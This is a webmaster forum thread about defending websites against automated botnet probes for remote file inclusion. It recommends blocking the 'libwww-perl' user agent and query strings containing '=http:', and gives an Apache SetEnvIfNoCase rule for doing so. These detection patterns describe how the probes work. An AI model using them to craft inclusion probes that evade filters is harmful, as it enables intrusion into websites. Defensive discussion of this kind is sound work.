Forum Moderators: open
#1 - Most botnet scripts don't set the user agent and it's typically the default of "libwww-perl".
#2 - The QUERY_STRING will almost always contain "=http:" that points to the file the botnet is trying to upload into the website.
Knowing this you can protect most websites from the most automated website vulnerability attacks by simply blocking all "libwww-perl" access and any QUERY_STRING that contains "=http:" in the parameter list.
Most software that does permit file uploads uses a POST so filtering out "=http:" in the QUERY_STRING should have no effect on any sites, except possibly stopping them from being hacked.
FWIW, if I were running a shared hosting company I would block these 2 things by default server wide just to help keep it clean. If blocking those 2 things cause customers any problems with real software then it's time they fix their software to use descriptive user agents and only permit file paths via POSTs.
Obviously the botnets can adapt to avoid the user agent trap and use POSTs, but that's no reason not to apply this level of security server-wide today as it will block a large percentage of what's being used today.
Blocking these 2 things just may buy you some time from when the vulnerability is posted to the time you or your customers get around to installing the fix without being hacked.
I'm added the block for QUERY_STRING containing "=http:" and will see how it goes over the next week or so.
Actually, I've never seen this query yet, but I probably miss more than I think.
Wouldn't it be better to just block all libwww user agent requests?
SetEnvIfNoCase User-Agent "libwww" bad_bot
[edited by: volatilegx at 3:44 pm (utc) on May 11, 2007]
[edit reason] removed link [/edit]
But it can be pretty hard to identify the query strings that should be allowed unless you wrote the script yourself. So for complex scripts that you didn't write yourself, you pretty much have to allow all query strings if you want the script to work properly. Filtering the query string just won't work for these complex third party scripts.
But it can be pretty hard to identify the query strings that should be allowed unless you wrote the script yourself.
Most query strings don't include file names, that's usually done via post.
Besides, if it isn't, you need to harass your script provider to change it as all the vulnerability probes use urls in the query string and it's just to be avoided IMO.
Besides, all the stupid RSS readers can fix their stinking scripts to identify themselves with the following line of PERL code:
$ua->agent("MyRSSReader");
Sloppy and lazy programming is never an excuse for allowing a default user agent from a toolkit access to your server. If the programmer isn't bright enough to change it then whatever he/she wrote probably shouldn't be hitting the web in the first place, not my server anyway.
Besides, all the stupid RSS readers can fix their stinking scripts to identify themselves with the following line of PERL code:$ua->agent("MyRSSReader");
Sloppy and lazy programming is never an excuse for allowing a default user agent from a toolkit access to your server. If the programmer isn't bright enough to change it then whatever he/she wrote probably shouldn't be hitting the web in the first place, not my server anyway.
Not my server either (I write most of my software myself in c++, including my main web server). But the fact is that there are just too many badly written programs and scripts out there and the best defense is to avoid them altogether in the first place rather than trying to reduce their damage by adding another layer of protection like filtering the query strings.
Yet I agree with you that if a badly writtenly script can't be avoided for some reason, and if the author won't or can't fix it for whatever reason, then it makes sense to do everything possible to reduce the potential damage.
But even if they change the ua string, so will the crackers too, don't you think?
The libwww-perl filter won't last forever, it only catches the lazy ones now, the smart ones already use something else. But that's no different than using filters to stop scrapers using broken MSIE UA's, the dumb ones just keep using them, the smart ones adapt.
Doesn't mean you shouldn't block the dumb ones as they're easy pick'n.
However, changing the libwww-perl still won't stop the filter of "http" in a query string which is the true vulnerability.
Doesn't mean you shouldn't block the dumb ones as they're easy pick'n.
Agreed.
However, changing the libwww-perl still won't stop the filter of "http" in a query string which is the true vulnerability.
Agreed. But I'd rather advise webmasters to get rid of the vulnerable script altogether if they can, especially if it is a complex third party script where they might have a hard time figuring out which query strings are safe and which are unsafe.
If they try to block all query strings because they can't distinguish the safe from the unsafe, there is no guarantee that the script will continue to work as intended or that webmasters will notice the breakage right away.
And if the script stops working as intended, couldn't it potentially have opened up other holes as well? - afterall, we agreed that the code was badly written to begin with, so breaking it in any way must be considered risky business. I can give a hypothetical example of this if you want.
But I'd rather advise webmasters to get rid of the vulnerable script altogether if they can, especially if it is a complex third party script where they might have a hard time figuring out which query strings are safe and which are unsafe.
How would you advise webmasters as many people that own web sites don't even bother looking in forums or anything on a regular basis. Shared hosting farms would just be wise to plug the hole and deal with the fall out of any broken scripts after the fact.
Likewaise, how do you know which script is vulnerable to advise them to get rid of in the first place?
Do you really think people just going to toss Joomla, Word Press or Photo Cart, all of which have been vulnerable to this particular threat?
I seriously doubt that's going to happen, but the point is that the ability to upload a file, which many scripts use for installing add-on components, is the root of the problem they all share in common which is a huge exploit at this time.
You can either:
a) heed my advice and eliminate file upload vulnerability probes, which may break a script or two until the authors can be compelled to fix it securely, or...
b) allow http paths in the query_string and roll the dice until you get hacked
I'll opt for "a" so that the automated botnets don't know I'm vulnerable.
FWIW, many of the more recent probes I've been watching don't even have the target script physically set to upload at the point of the vulnerability probe. They appear to be building a list of sites that respond positively to the probe so they can come back and hack you later. That means you won't even know you're a vulnerable target until much later compared to some of the botnet probes I've seen in the past that infiltrate the server on initial contact.
You may be on the list to be hacked at this very minute and not know it!
Shared hosting farms would just be wise to plug the hole and deal with the fall out of any broken scripts after the fact.
That's a pretty good advice except when the fallout is such that the broken scripts open up more security holes that webhosts didn't even know existed before they tried to plug the hole. Blocking query strings indiscriminately can have unintended security repercussions because it is exploitable in theory, so some caution should be advocated.
Do you really think people just going to toss Joomla, Word Press or Photo Cart, all of which have been vulnerable to this particular threat?
You may be on the list to be hacked at this very minute and not know it!
FWIW and from my POV, I don't see any disagreement between us on this topic: you are telling webmasters how to hit the nail on the head to solve the problem, and I'm telling them how to avoid hitting their fingers too in the process. Surely we can conclude this topic on that friendly agreement, can't we?